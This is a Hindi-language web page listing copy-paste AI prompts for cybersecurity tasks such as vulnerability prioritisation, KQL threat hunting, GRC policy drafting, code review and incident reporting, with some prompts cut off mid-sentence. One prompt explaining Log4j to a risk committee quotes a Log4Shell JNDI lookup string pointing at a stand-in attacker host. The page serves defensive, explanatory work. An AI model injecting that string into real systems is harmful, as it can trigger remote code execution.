इनमें से कोई भी सीधे ChatGPT, Claude या Gemini में कॉपी कीजिए, फिर कोष्ठक वाले हिस्सों की जगह अपनी जानकारी डालिए।
32 कॉपी-पेस्ट प्रॉम्प्ट
1भेद्यता प्राथमिकता के लिए AI प्रॉम्प्ट
आप एक वरिष्ठ साइबर सुरक्षा विश्लेषक हैं। एक प्रोडक्शन वेब सर्वर (संपत्ति की गंभीरता: उच्च) के Nessus स्कैन से प्राप्त निम्नलिखित भेद्यता डेटा को देखते हुए, तत्काल निवारण के लिए शीर्ष 3 भेद्यताओं को प्राथमिकता दें। प्रत्येक के लिए, एक-वाक्य का औचित्य प्रदान करें जो सामान्य CVSS स्कोर से परे, संदर्भ में विशिष्ट जोखिम को समझाता हो। **Nessus डेटा:** 1. CVE-2023-34048 (CVSS 9.8): VMware vCenter Server आउट-ऑफ-बाउंड्स राइट भेद्यता। 2. CVE-2021-44228 (Log4Shell, CVSS 10.0): Apache Log4j रिमोट कोड निष्पादन। सर्वर एक विरासत Java एप्लिकेशन चला रहा है। 3. CVE-2024-21893 (CVSS 8.8): Ivanti Connect Secure SSRF भेद्यता। 4. अनपैच्ड Apache Struts (कोई विशिष्ट CVE नहीं दिया गया है, लेकिन RCE के प्रति संवेदनशील होने के लिए जाना जाता है)। 5. TLS 1.0 सक्षम (CVSS 2.6)।
2RMF प्रबंधन नीति का मसौदा तैयार करने के लिए प्रॉम्प्ट
एक GRC विश्लेषक के रूप में कार्य करें। मुझे NIST AI RMF के 'मैनेज' कार्य के लिए एक नीति का मसौदा तैयार करने की आवश्यकता है। हमारा संगठन EDR के लिए Microsoft Defender for Endpoint, स्वचालित सुरक्षा सत्यापन के लिए Pentera, और गवर्नेंस के लिए Credo AI का उपयोग करता है। एक नीति अनुभाग का मसौदा तैयार करें जो परिभाषित करता है कि इन टूल द्वारा पहचाने गए जोखिमों का प्रबंधन कैसे किया जाएगा। निर्दिष्ट करें: 1. डिफेंडर में स्वचालित प्रतिक्रिया के लिए गंभीरता सीमाएँ (उदाहरण के लिए, क्या स्वचालित डिवाइस अलगाव को ट्रिगर करता है)। 2. Pentera द्वारा पाई गई 'क्रिटिकल' और 'हाई' कमजोरियों के सुधार के लिए SLA। 3. Credo AI में पहचाने गए मॉडल पूर्वाग्रह मुद्दों को लॉग करने और ट्रैक करने की प्रक्रिया, जिसमें स्वामित्व और समीक्षा की आवृत्ति शामिल है।
एक वरिष्ठ सुरक्षा विश्लेषक के रूप में कार्य करें। मेरे पास एक स्कैनर से एक भेद्यता रिपोर्ट है। निम्नलिखित संदर्भ के आधार पर निष्कर्षों को प्राथमिकता दें: - प्रभावित परिसंपत्ति एक सार्वजनिक-सामना करने वाला वेब सर्वर है जो Linux चला रहा है, जिसे 'महत्वपूर्ण' के रूप में टैग किया गया है। - एप्लिकेशन एक ई-कॉमर्स प्लेटफ़ॉर्म है जो क्रेडिट कार्ड डेटा को संसाधित करता है। - हमारे प्राथमिक खतरे रैंसमवेयर समूह और अवसरवादी वित्तीय हमलावर हैं। यहाँ भेद्यता डेटा (CSV प्रारूप में) है: [[CVE-ID]], [[CVSS Score]], [[Vulnerability Name]], [[Asset IP]] CVE-2026-XXXX, 9.8, "Remote Code Execution in Apache Struts", 1.2.3.4 CVE-2026-YYYY, 7.5, "Cross-Site Scripting in Web Framework", 1.2.3.4 पहले किस CVE को संबोधित करना है, इसकी एक प्राथमिकता वाली सूची प्रदान करें और अपने तर्क को एक मार्कडाउन तालिका में समझाएं।
एक SOC विश्लेषक के रूप में कार्य करें। मुझे Microsoft Sentinel का उपयोग करके Windows एंडपॉइंट्स पर दृढ़ता के संकेतों की तलाश करने की आवश्यकता है। जिस तकनीक की मैं तलाश कर रहा हूँ वह एक नई सेवा का निर्माण और फिर थोड़े समय में शुरू होना है। एक Kusto Query Language (KQL) क्वेरी उत्पन्न करें जो: 1. Windows Event ID 4697 (सिस्टम में एक सेवा स्थापित की गई थी) की तलाश करता है। 2. Windows Event ID 7036 (एक सेवा रनिंग स्थिति में प्रवेश कर गई) की तलाश करता है। 3. ServiceName और होस्ट द्वारा इन घटनाओं को जोड़ता है। 4. उन उदाहरणों के लिए फ़िल्टर करता है जहाँ सेवा स्थापित होने के 5 मिनट के भीतर शुरू की गई थी। 5. होस्टनाम, सेवा नाम और इसे स्थापित करने वाले उपयोगकर्ता को सूचीबद्ध करता है।
. 1. In simple terms, what does this malware signature typically indicate? 2. What is the common behavior of this malware family? (e.g., ransomware, infostealer, RAT) 3. What are the 3-5 immediate next steps a junior analyst should take to investigate the host
, generate three distinct threat hunting hypotheses. For each hypothesis, specify: 1. The Hypothesis itself. 2. The Data Sources required (e.g., EDR logs, DNS logs, proxy logs). 3. A sample query (in pseudo-query language) to test the hypothesis. Example format: **Hypothesis 1:** The threat actor is using scheduled tasks to establish persistence. **Data Source:** EDR process creation logs, Windows Event Logs (ID 4698). **Query:**
Act as a security consultant. I need to configure a Tenable Nessus scan for a new segment of our network that contains `[[SERVER_TYPES]]` (e.g., web servers, database servers, domain controllers). Recommend a Nessus scan policy configuration. Your recommendation should cover: - **Scan Template:** Which Nessus template to start with (e.g., Basic Network Scan, Credentialed Patch Audit). - **Credentials:** Why a credentialed scan is necessary. - **Plugins:** Which plugin families are most important to enable for these server types. - **Frequency:** A recommended scan frequency (e.g., weekly, monthly). Provide the output as a set of clear recommendations with brief justifications for each.
, but we have determined it is a false positive. I need to write a formal justification for our records. Draft a paragraph that explains *why* this finding is a false positive. Use the following information: - **Finding:** The scanner identified
You are a vulnerability analyst reporting to the CISO. I have a list of 5 critical vulnerabilities that were discovered this week. Create a high-level summary table for a management report. The table should have the following columns: - `Vulnerability (CVE)` - `Systems Affected (Count)` - `Recommended Action` - `Assigned Team` - `Remediation ETA` Populate the table using this data: - **CVE-2026-1001:** Affects 15 web servers. Action: Apply vendor patch. Team: Web Ops. ETA: 7 days. - **CVE-2026-1002:** Affects 50 workstations. Action: Deploy updated software via SCCM. Team: Desktop Engineering. ETA: 14 days. - **CVE-2026-1003:** Affects 2 domain controllers. Action: Apply registry key change. Team: Infrastructure. ETA: 3 days. - **CVE-2026-1004:** Affects 10 Linux servers. Action: Update kernel. Team: Linux Ops. ETA: 10 days. - **CVE-2026-1005:** Affects 1 custom application. Action: Developer code fix. Team: AppDev. ETA: 30 days.
code snippet for potential OWASP Top 10 vulnerabilities, specifically looking for: - Injection flaws (SQL, Command) - Broken Authentication - Sensitive Data Exposure - Insecure Deserialization For each issue you find, provide: 1. The vulnerable line number. 2. A brief explanation of the vulnerability. 3. A code example showing how to fix it. If no issues are found, state that. Code Snippet:
Our Snyk scan has found a critical vulnerability (`[[CVE_ID]]`) in the open-source library `[[LIBRARY_NAME]]`, version `[[VERSION_NUMBER]]`. Explain this vulnerability to a development team. Your explanation should include: 1. What the vulnerability allows an attacker to do (e.g., remote code execution, denial of service). 2. How the vulnerability is triggered. 3. What the recommended action is (e.g., "Upgrade to version X.Y.Z"). Keep the explanation concise and focused on what the developers need to know to fix it.
Act as a principal security engineer. Write a secure coding guideline for our development team on the topic of "Input Validation". The guideline should be a markdown document that includes: - A brief, simple explanation of why input validation is important. - A "Do" section with 2-3 best practices (e.g., use allow-lists, validate on the server-side). - A "Don't" section with 2-3 common mistakes (e.g., rely only on client-side validation, use block-lists). - A short, clear code example in `[[LANGUAGE]]` showing a "bad" vs. "good" implementation.
function that is vulnerable to SQL injection. Refactor the code to use parameterized queries (prepared statements) to prevent this vulnerability. Show the "before" and "after" code blocks. Vulnerable Code:
Act as a GRC analyst. I need to draft a new corporate security policy on "Acceptable Use of AI Tools". The policy should be structured with the following sections: 1. **Purpose:** Why this policy exists. 2. **Scope:** Who this policy applies to. 3. **Policy Statements:** A list of rules, including: - Prohibition on using public AI tools with sensitive company or customer data. - Requirement to use only company-approved AI platforms. - Guidelines on verifying the accuracy of AI-generated content. - A statement on data ownership and confidentiality. 4. **Enforcement:** The consequences of violating the policy. Generate a professional draft of this policy.
I am preparing for an audit. I need to map our existing ISO 27001 controls to the SOC 2 Trust Services Criteria. For the following ISO 27001 control, identify the corresponding SOC 2 criteria it helps satisfy. **ISO 27001 Control:** `[[ISO_CONTROL_DESCRIPTION]]` (e.g., "A.9.4.1: Information access restriction") Provide the corresponding SOC 2 TSC and a brief one-sentence explanation of the mapping. Example Output: **SOC 2 TSC:** CC6.1 - Logical Access Security **Explanation:** This control directly supports the SOC 2 requirement to restrict logical access to information and systems based on roles and responsibilities.
I am conducting a risk assessment on our new `[[CLOUD_SERVICE_NAME]]` deployment. Generate a risk scenario related to "Inadequate Access Controls". The scenario should be structured with these fields: - **Risk Scenario:** A brief, one-sentence description of the event. - **Threat Actor:** Who might cause this (e.g., Malicious Insider, External Attacker). - **Vulnerability:** The weakness that allows it (e.g., Overly permissive IAM roles). - **Impact:** The business outcome if it occurs (e.g., Data breach, service disruption). - **Existing Controls:** What we currently have in place (e.g., MFA, basic logging). Fill out this structure for the "Inadequate Access Controls" risk.
24Translate Technical Findings for a Risk Committee
I need to explain the risk of an unpatched Log4j vulnerability (CVE-2021-44228) to a non-technical risk committee. Translate the following technical description into a simple, analogy-based business risk statement. Avoid jargon like RCE, JNDI, and LDAP. **Technical Description:** "The Log4j vulnerability allows for unauthenticated remote code execution (RCE) by logging a specially crafted string. An attacker can send a string like `${jndi:ldap://attacker.com/a}` which causes the server to connect back to the attacker's system and execute a malicious payload." Focus on what it means for the business (e.g., "It's like leaving a back door unlocked...").
You are a senior incident response manager. Our team has just resolved a `[[INCIDENT_TYPE]]` incident. Create a detailed outline for a Post-Incident Review (PIR) document. The outline should include all major sections and sub-bullets for the key topics to cover in each. Include sections for: 1. Executive Summary 2. Incident Timeline (Key Events) 3. Root Cause Analysis (What failed?) 4. Impact Assessment (Business, Technical, Financial) 5. Lessons Learned (What went well? What went poorly?) 6. Action Items (A table with columns for Action, Owner, and Due Date)
28Formulate Questions for a Forensic Investigation
We are beginning a digital forensics investigation on a compromised host (`[[HOSTNAME]]`) related to a data exfiltration incident. Act as a lead forensic investigator. Generate a list of the top 10 key questions our investigation needs to answer. The questions should be focused on establishing the full scope and timeline of the breach. Examples: - How did the attacker gain initial access to the host? - What tools did the attacker use on the host? - What data was accessed or exfiltrated from the host?
You are the head of corporate communications, working with the security team. We need to send a brief internal update to all employees about a recent security incident that has been resolved. The incident was a `[[INCIDENT_TYPE]]` that caused `[[IMPACT]]`. Draft a short, reassuring, and non-technical message for all staff. The message should: - Acknowledge that a disruption occurred. - Confirm that the issue is now resolved. - Thank the security team. - Remind employees to remain vigilant and report suspicious activity. Do not include technical details about the incident.
Act as a senior application security engineer. Review the following Python code snippet for potential security vulnerabilities, specifically looking for injection flaws (SQLi, Command Injection), insecure deserialization, and improper error handling. For each finding, provide the CWE number, explain the risk in the context of this code, and suggest a specific, secure code replacement. [[PASTE CODE SNIPPET HERE]]
Act as a GRC analyst specializing in AI governance. I have the following security control from our System Security Plan: "All cloud database instances are configured with encryption at-rest using AES-256." Map this control to the relevant subcategories within the NIST AI Risk Management Framework (AI RMF 1.0) Core Functions (Govern, Map, Measure, Manage). For each mapping, explain the rationale.
साइबर सुरक्षा के लिए इन प्रॉम्प्ट का इस्तेमाल कैसे करें
चार कदम, करीब एक मिनट। ढाँचा प्रॉम्प्ट देता है, ब्यौरा आप देते हैं।
1
प्रॉम्प्ट चुनें
यहाँ हर प्रॉम्प्ट किसी खास काम के लिए लिखा गया है — “एक्सपर्ट की तरह काम करो” जैसा सामान्य टेम्पलेट नहीं। शीर्षक देखिए और जो आपके सामने के काम से मेल खाए, वही लीजिए।
2
कॉपी करके पेस्ट करें
कॉपी दबाइए और पूरा टेक्स्ट ChatGPT, Claude, Gemini या जिस असिस्टेंट का आप पहले से भुगतान करते हैं, उसमें पेस्ट कीजिए। यहाँ कुछ भी किसी एक मॉडल से बँधा नहीं है।
3
कोष्ठक भरें
भेजने से पहले हर [कोष्ठक वाले हिस्से] की जगह अपनी जानकारी डालिए। गुणवत्ता वहीं से आती है — ढाँचा प्रॉम्प्ट देता है, ब्यौरा आप।
4
स्रोत गाइड देखें
हर प्रॉम्प्ट के नीचे दिया “स्रोत” लिंक पूरा लेख खोलता है: प्रॉम्प्ट ऐसा क्यों बना है, किस पर परखा गया, और किन टूल्स के साथ चलता है।
अक्सर पूछे जाने वाले सवाल
असली काम में इनमें से कोई प्रॉम्प्ट पेस्ट करने से पहले जो सवाल उठते हैं।
क्या ये प्रॉम्प्ट मुफ़्त इस्तेमाल किए जा सकते हैं?
हाँ। इस पेज के सभी 32 प्रॉम्प्ट किसी भी एआई असिस्टेंट के साथ मुफ़्त कॉपी और इस्तेमाल किए जा सकते हैं, जिनमें ChatGPT, Claude और Gemini शामिल हैं। बस उनमें से किसी एक पर खाता चाहिए।
साइबर सुरक्षा के लिए इन एआई प्रॉम्प्ट का इस्तेमाल कैसे करूँ?
कॉपी बटन से पूरा टेक्स्ट लीजिए, अपने एआई असिस्टेंट में पेस्ट कीजिए, और भेजने से पहले [आपका शहर] या [कंपनी का नाम] जैसे कोष्ठक वाले हिस्सों की जगह अपनी जानकारी डालिए।
ये प्रॉम्प्ट कहाँ से आते हैं?
हर प्रॉम्प्ट Zekai की एक परखी हुई गाइड से आता है। हर प्रॉम्प्ट के नीचे दिया “स्रोत” लिंक पूरे लेख पर ले जाता है, जो उसकी सोच और परखने का तरीका बताता है।
क्या मैं इन प्रॉम्प्ट को बदल सकता हूँ?
ज़रूर। हर प्रॉम्प्ट को शुरुआती ढाँचा मानिए: निर्देश कसिए, अपनी शर्तें जोड़िए, और जो संस्करण सबसे अच्छा नतीजा दे उसे रख लीजिए। कोष्ठक बताते हैं कि हमेशा क्या बदलना है।
दूसरे पेशों की प्रॉम्प्ट लाइब्रेरी
वही स्वरूप, दूसरा काम — साइबर सुरक्षा के सबसे करीबी पेशों से शुरू करते हुए।